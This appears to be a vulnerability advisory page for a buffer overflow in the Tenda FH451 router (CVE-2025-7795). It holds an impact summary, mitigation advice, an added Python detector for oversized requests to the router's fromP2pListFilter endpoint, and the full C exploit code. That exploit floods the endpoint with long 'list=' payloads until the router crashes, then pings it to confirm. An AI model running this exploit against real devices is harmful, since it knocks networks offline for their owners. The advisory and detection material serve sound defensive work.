Tenda FH451 1.0.0.9 Router - Stack-based Buffer Overflow
AI Analysis
Technical Summary
The Tenda FH451 router running firmware version 1.0.0.9 is vulnerable to a stack-based buffer overflow. This type of vulnerability occurs when a program writes more data to a buffer located on the stack than it can hold, potentially overwriting adjacent memory and leading to arbitrary code execution or denial of service. The vulnerability is remotely exploitable, meaning an attacker can trigger the overflow over the network without requiring local access. The exploit code is publicly available and written in the C programming language, indicating that the vulnerability has been analyzed and weaponized to some extent. Although no specific details about the vulnerable function or the exact overflow vector are provided, the presence of a stack-based buffer overflow in a network-facing device like a router is critical because it can allow attackers to compromise the device, intercept or manipulate network traffic, or pivot into internal networks. The lack of patch information suggests that no official fix has been released yet, increasing the risk for affected users. The exploit does not require user interaction, and no authentication requirements are mentioned, which further increases the attack surface.
Potential Impact
For European organizations, this vulnerability poses a significant risk, especially for those relying on Tenda FH451 routers in their network infrastructure. Successful exploitation could lead to full compromise of the router, enabling attackers to intercept sensitive communications, disrupt network availability, or use the device as a foothold for lateral movement within corporate networks. This could result in data breaches, operational downtime, and loss of trust. Small and medium enterprises (SMEs) and home office setups that use consumer-grade Tenda routers are particularly vulnerable due to typically weaker network segmentation and security monitoring. Additionally, critical infrastructure sectors that depend on reliable network equipment could face service interruptions or targeted attacks leveraging this vulnerability.
Mitigation Recommendations
Organizations should immediately inventory their network devices to identify any Tenda FH451 routers running firmware version 1.0.0.9. Given the absence of an official patch, mitigation should focus on network-level protections such as isolating vulnerable devices behind firewalls, restricting management interfaces to trusted IPs, and disabling remote management features if not needed. Network intrusion detection systems (NIDS) should be tuned to detect exploit attempts targeting this vulnerability. Where possible, replacing the affected routers with devices from vendors that provide timely security updates is recommended. Monitoring network traffic for unusual patterns and maintaining up-to-date backups of router configurations can aid in rapid recovery if compromise occurs. Finally, organizations should stay alert for vendor advisories or patches addressing this issue and apply them promptly once available.
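The NIDS-tuning recommendation above can be made concrete, because the published exploit code on this page shows the vector: an unauthenticated HTTP POST to /goform/fromP2pListFilter whose list= form parameter carries several thousand bytes (the PoC starts at 3500 and grows in steps of 1000). The following is an added example written for this page, not part of the original analysis or the exploit author's code. It parses raw HTTP requests, flags POSTs to that endpoint whose form parameters exceed a length threshold, and returns one finding per hit so it can feed an alerting pipeline. The 512-byte threshold and the sample requests are assumptions constructed for the demonstration; the endpoint and parameter name come from the page.

```python
"""Added example (not from the page or the exploit author): flag oversized
form parameters sent to the Tenda goform endpoint named in the published PoC.
All sample requests below are constructed for the demonstration."""
from urllib.parse import parse_qsl

# Endpoint and parameter name are taken from the published exploit code on this page.
WATCHED_ENDPOINT = "/goform/fromP2pListFilter"
# Assumption: no legitimate request to this endpoint needs a form value this long.
DEFAULT_MAX_PARAM_LEN = 512


def parse_http_request(raw: bytes) -> dict:
    """Split a raw HTTP/1.x request into method, path, headers and body."""
    head, _sep, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    # Honour Content-Length so trailing bytes from a pipelined request are ignored.
    length = int(headers.get("content-length", len(body)))
    return {"method": method, "path": path.split("?", 1)[0],
            "headers": headers, "body": body[:length]}


def inspect_request(req: dict, max_param_len: int = DEFAULT_MAX_PARAM_LEN):
    """Return a finding dict if the request matches the overflow pattern, else None."""
    if req["method"] != "POST" or req["path"] != WATCHED_ENDPOINT:
        return None
    params = parse_qsl(req["body"].decode("latin-1"), keep_blank_values=True)
    oversized = [(name, len(value)) for name, value in params if len(value) > max_param_len]
    if not oversized:
        return None
    return {"path": req["path"], "oversized": oversized, "body_len": len(req["body"])}


def scan(raw_requests, max_param_len: int = DEFAULT_MAX_PARAM_LEN):
    """Run the inspector over a batch of raw requests; one finding per matching request."""
    findings = []
    for raw in raw_requests:
        finding = inspect_request(parse_http_request(raw), max_param_len)
        if finding:
            findings.append(finding)
    return findings


def build_request(path: str, body: bytes, method: str = "POST") -> bytes:
    """Construct a sample HTTP/1.1 request for the demonstration."""
    return (f"{method} {path} HTTP/1.1\r\nHost: router.local\r\n"
            f"Content-Type: application/x-www-form-urlencoded\r\n"
            f"Content-Length: {len(body)}\r\n\r\n").encode() + body


# Constructed samples: a short benign value, the PoC's 3500-byte pattern, the same
# oversized body aimed at an unrelated path (not this rule's job), and a GET.
SAMPLE_REQUESTS = [
    build_request(WATCHED_ENDPOINT, b"list=00:11:22:33:44:55"),
    build_request(WATCHED_ENDPOINT, b"list=" + b"A" * 3500),
    build_request("/goform/otherHandler", b"list=" + b"A" * 3500),
    build_request(WATCHED_ENDPOINT, b"", method="GET"),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_REQUESTS):
        print(f"ALERT {f['path']}: oversized params {f['oversized']} "
              f"(body {f['body_len']} bytes)")
```

Run against the constructed samples only the second request is reported. Matching on path plus parameter length, rather than on a fixed byte pattern such as a run of 'A's, keeps the rule useful when the padding byte changes; the threshold can be lowered once the normal size of that form field on a given network is known.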
Affected Countries
Germany, France, United Kingdom, Italy, Spain, Netherlands, Poland
Indicators of Compromise
- exploit-code:

/*
 * Title         : Tenda FH451 1.0.0.9 Router - Stack-based Buffer Overflow
 * Author        : Byte Reaper
 * Telegram      : @ByteReaper0
 * CVE           : CVE-2025-7795
 * Vulnerability : Buffer Overflow
 * Description   :
 *   A buffer overflow vulnerability affecting certain Tenda routers,
 *   exploitable via an unauthenticated POST request to an unprotected
 *   endpoint, leading to service crash.
 */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include "argparse.h"      /* third-party single-header argparse, not a system header */
#include <arpa/inet.h>
#include <stdlib.h>
#include <curl/curl.h>
#include <sys/wait.h>

#define FULL_URL  2500
#define POST_DATA 10000

const char *targetUrl = NULL;
const char *targetip  = NULL;
int selectIp  = 0;
int selectUrl = 0;
int verbose   = 0;
int showOne   = 0;
char postData[POST_DATA];

struct Mem {
    char *buffer;
    size_t len;
};

/* libcurl write callback: append the response body to a growing heap buffer */
size_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata)
{
    size_t total = size * nmemb;
    struct Mem *m = (struct Mem *)userdata;
    char *tmp = realloc(m->buffer, m->len + total + 1);
    if (!tmp)
        return 0;
    m->buffer = tmp;
    memcpy(&(m->buffer[m->len]), ptr, total);
    m->len += total;
    m->buffer[m->len] = '\0';
    return total;
}

/* Fork and run /bin/ping against the target to see whether it still answers;
 * the child issues execve through a raw x86-64 syscall. */
void pingPacket(void)
{
    pid_t pid = fork();
    printf("\n============================================== [Ping] ==============================================\n");
    if (pid < 0) {
        perror("\e[1;31m[-] Fork Failed!\e[0m");
        exit(1);
    }
    if (pid == 0) {
        printf("\e[1;32m[+] Child Process (Ping) -> PID: %d\e[0m\n", getpid());
        char *const argv[] = { "/bin/ping", "-c", "3", (char *)targetip, NULL };
        char *const envp[] = { NULL };
        __asm__ volatile (
            "mov $59, %%rax\n\t"          /* SYS_execve */
            "mov %[prog], %%rdi\n\t"
            "mov %[argv], %%rsi\n\t"
            "mov %[envp], %%rdx\n\t"
            "syscall\n\t"
            "mov $60, %%rax\n\t"          /* SYS_exit, reached only if execve failed */
            "xor %%rdi, %%rdi\n\t"
            "syscall\n\t"
            :
            : [prog] "r" (argv[0]), [argv] "r" (argv), [envp] "r" (envp)
            : "rax", "rdi", "rsi", "rdx"
        );
    } else {
        printf("\e[1;32m[+] Main PID : %d\e[0m\n", getpid());
        int status;
        waitpid(pid, &status, 0);
        if (WIFEXITED(status)) {
            int code = WEXITSTATUS(status);
            printf("\e[1;33m[+] Ping exited with code: %d\e[0m\n", code);
            if (code == 0) {
                printf("\e[1;31m[-] Successfully confirmed connection via ping!\e[0m\n");
                printf("\e[1;31m[-] The server is still working, please try again!\n\e[0m");
            } else {
                printf("\e[1;34m[+] The server is not responding to the ping request!\e[0m\n");
                printf("\e[1;34m[+] CVE-2025-7795: Vulnerability confirmed! Server is down.\e[0m\n");
            }
        }
    }
    printf("\n============================================================================================\e[0m\n");
}

/* Send a series of POST requests with a growing "list=" parameter and report
 * how the target responds after each one. */
void sendRequest(void)
{
    CURL *c = curl_easy_init();
    CURLcode res;
    char full[FULL_URL];
    struct Mem response = {NULL, 0};

    if (!c) {
        printf("\e[1;31m[-] Error Create Object Curl !\e[0m\n");
        exit(EXIT_FAILURE);
    }
    if (targetip)  selectIp  = 1;
    if (targetUrl) selectUrl = 1;
    if (selectIp) {
        snprintf(full, sizeof(full), "http://%s/goform/fromP2pListFilter", targetip);
    }
    if (selectUrl) {
        snprintf(full, sizeof(full), "%s/goform/fromP2pListFilter", targetUrl);
    }

    int rounds = 5;
    int baseLen = 3500, step = 1000;
    showOne = 1;
    for (int i = 0; i < rounds; i++) {
        int len = baseLen + i * step;
        if ((size_t)(len + 6) >= sizeof(postData))
            break;
        snprintf(postData, sizeof(postData), "list=");
        memset(postData + 5, 'A', len);
        postData[5 + len] = '\0';
        printf("\e[1;34m[%d] Iteration %d - Length: %d\e[0m\n", i + 1, i + 1, len);
        if (verbose) {
            printf("\e[1;35m\n====================================================================[Post Data] ====================================================================\e[0m\n");
            printf("%s\e[0m\n\n", postData);
            printf("\e[1;35m====================================================================[Post Data] ====================================================================\e[0m\n");
        }

        curl_easy_reset(c);
        curl_easy_setopt(c, CURLOPT_URL, full);
        curl_easy_setopt(c, CURLOPT_ACCEPT_ENCODING, "");
        curl_easy_setopt(c, CURLOPT_FOLLOWLOCATION, 1L);
        curl_easy_setopt(c, CURLOPT_POST, 1L);
        curl_easy_setopt(c, CURLOPT_POSTFIELDS, postData);
        curl_easy_setopt(c, CURLOPT_POSTFIELDSIZE, (long)strlen(postData));
        curl_easy_setopt(c, CURLOPT_WRITEFUNCTION, write_cb);
        curl_easy_setopt(c, CURLOPT_WRITEDATA, &response);
        curl_easy_setopt(c, CURLOPT_CONNECTTIMEOUT, 5L);
        curl_easy_setopt(c, CURLOPT_TIMEOUT, 10L);
        curl_easy_setopt(c, CURLOPT_SSL_VERIFYPEER, 0L);
        curl_easy_setopt(c, CURLOPT_SSL_VERIFYHOST, 0L);

        struct curl_slist *h = NULL;
        h = curl_slist_append(h, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
        h = curl_slist_append(h, "Accept-Encoding: gzip, deflate, br");
        h = curl_slist_append(h, "Accept-Language: en-US,en;q=0.5");
        h = curl_slist_append(h, "Connection: keep-alive");
        h = curl_slist_append(h, "Referer: http://example.com");
        h = curl_slist_append(h, "Cache-Control: no-cache");
        h = curl_slist_append(h, "Pragma: no-cache");
        curl_easy_setopt(c, CURLOPT_HTTPHEADER, h);
        if (verbose)
            curl_easy_setopt(c, CURLOPT_VERBOSE, 1L);

        char *encode1 = curl_easy_escape(c, full, 0);
        if (!encode1) {
            printf("\e[1;31m[-] URL encoding failed for payload\e[0m\n");
            exit(EXIT_FAILURE);
        }
        if (verbose && showOne) {
            printf("\e[1;37m=========================================");
            if (selectUrl)
                printf("\e[1;37m[+] Input Url : %s\e[0m\n[+] Encode Url : %s\e[0m\n[+] full format Url : %s\e[0m\n", targetUrl, encode1, full);
            if (selectIp)
                printf("\e[1;37m[+] Input Ip : %s\e[0m\n[+] full format Url : %s\e[0m\n", targetip, full);
            printf("=========================================");
            showOne = 0;
        }

        res = curl_easy_perform(c);
        curl_slist_free_all(h);
        curl_free(encode1);

        if (res == CURLE_OK) {
            long httpCode = 0;
            printf("\e[1;36m[+] Request sent successfully\e[0m\n");
            curl_easy_getinfo(c, CURLINFO_RESPONSE_CODE, &httpCode);
            printf("\e[1;32m[+] Http Code Response : %ld\e[0m\n", httpCode);
            if (httpCode >= 200 && httpCode < 300) {
                printf("\e[1;31m[-] The server was not affected, still working !\n");
                printf("\e[1;33m-------------------------------- Response Server --------------------------------\e[0m\n");
                printf("%s\e[0m\n", response.buffer ? response.buffer : "");
                printf("\e[1;33m-----------------------------------------------------------------------------------\e[0m\n");
            } else {
                printf("\e[1;34m[+] Negative server response. I started trying to confirm the connection...\e[0m\n");
                printf("[+] Run Command Ping For Check Connection : \e[0m\n");
                if (selectIp)
                    pingPacket();
                else
                    printf("[-] Error Run Command Ping for URL !\e[0m\n[-] Please Enter Target Ip for Check Connection !\e[0m\n");
            }
        } else {
            printf("[-] Error Send Request, Please Check Your Connection !\e[0m\n");
            printf("[-] Error : %s\n", curl_easy_strerror(res));
        }

        /* Release the response body only after it has been printed, then start
         * the next iteration with an empty buffer. */
        if (response.buffer) {
            free(response.buffer);
            response.buffer = NULL;
            response.len = 0;
        }
    }
    free(response.buffer);
    curl_easy_cleanup(c);
}

int main(int argc, const char **argv)
{
    printf(
        "\e[1;31m"
        "▄▖▖▖▄▖ ▄▖▄▖▄▖▄▖ ▄▖▄▖▄▖▄▖ \n"
        "▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖ ▌ ▌▙▌▙▖ \n"
        "▙▖▚▘▙▖ ▙▖█▌▙▖▄▌ ▌ ▌▄▌▄▌ \n"
        " \e[1;37mByte Reaper\e[0m\n"
    );
    printf("\e[1;37m---------------------------------------------------------------------------------------------------------------------------------\e[0m\n");

    /* Re-launch through sudo when not root (raw ping needs privileges on some systems) */
    if (getuid() != 0) {
        printf("===================================================\e[0m\n");
        printf("[-] Not running as root. Trying with sudo...\e[0m\n");
        char *args[] = { (char *)"sudo", (char *)"./exploit", NULL };
        execvp("sudo", args);
        perror("[-] Error Run Exploit in Root !");
        __asm__ volatile (
            "mov $0x3C, %%rax\n\t"        /* SYS_exit */
            "xor %%rdi, %%rdi\n\t"
            "syscall\n\t"
            : : : "rax", "rdi"
        );
    }
    printf("\e[1;36m[+] Running as root! Exploit continues...\e[0m\n");
    printf("===================================================\e[0m\n");

    struct argparse_option options[] = {
        OPT_HELP(),
        OPT_STRING('i', "ip", &targetip, "Enter Target IP"),
        OPT_STRING('u', "url", &targetUrl, "Enter Target URL"),
        OPT_BOOLEAN('v', "verbose", &verbose, "Verbose Mode"),
        OPT_END(),
    };
    struct argparse argparse;
    argparse_init(&argparse, options, NULL, 0);
    argparse_parse(&argparse, argc, argv);

    if (!targetip && !targetUrl) {
        printf("\e[1;33m[-] Please Enter Target IP OR URL !\e[0m\n");
        printf("\e[1;33m[!] Example : ./exploit -u http://ROUTER_IP\e[0m\n");
        printf("[+] OR \n");
        printf("\e[1;33m[!] Example : ./exploit -i ROUTER_IP\e[0m\n");
        __asm__ volatile (
            "xor %%rdi, %%rdi\n\t"
            "mov $0x3C, %%rax\n\t"        /* SYS_exit */
            "1:\n\t"
            "syscall\n\t"
            : : : "rax", "rdi", "rsi"
        );
    }
    if (targetip && targetUrl) {
        printf("[+] Please Enter Target URL OR Target Ip address, Exit...\e[0m\n");
        __asm__ volatile (
            "mov $0x3C, %%rax\n\t"        /* SYS_exit */
            "xor %%rdi, %%rdi\n\t"
            "syscall\n\t"
            : : : "rax", "rdi"
        );
    }

    /* Either an IP or a URL is set at this point; sendRequest() handles both. */
    sendRequest();
    return 0;
}
Technical Details
- Edb Id: 52374
- Has Exploit Code: true
- Code Language: c
Threat ID: 687ffbf0a915ff00f7fb52bb
Added to database: 7/22/2025, 9:00:32 PM
Last enriched: 8/11/2025, 1:18:47 AM
Last updated: 8/15/2025, 1:24:25 AM
Views: 17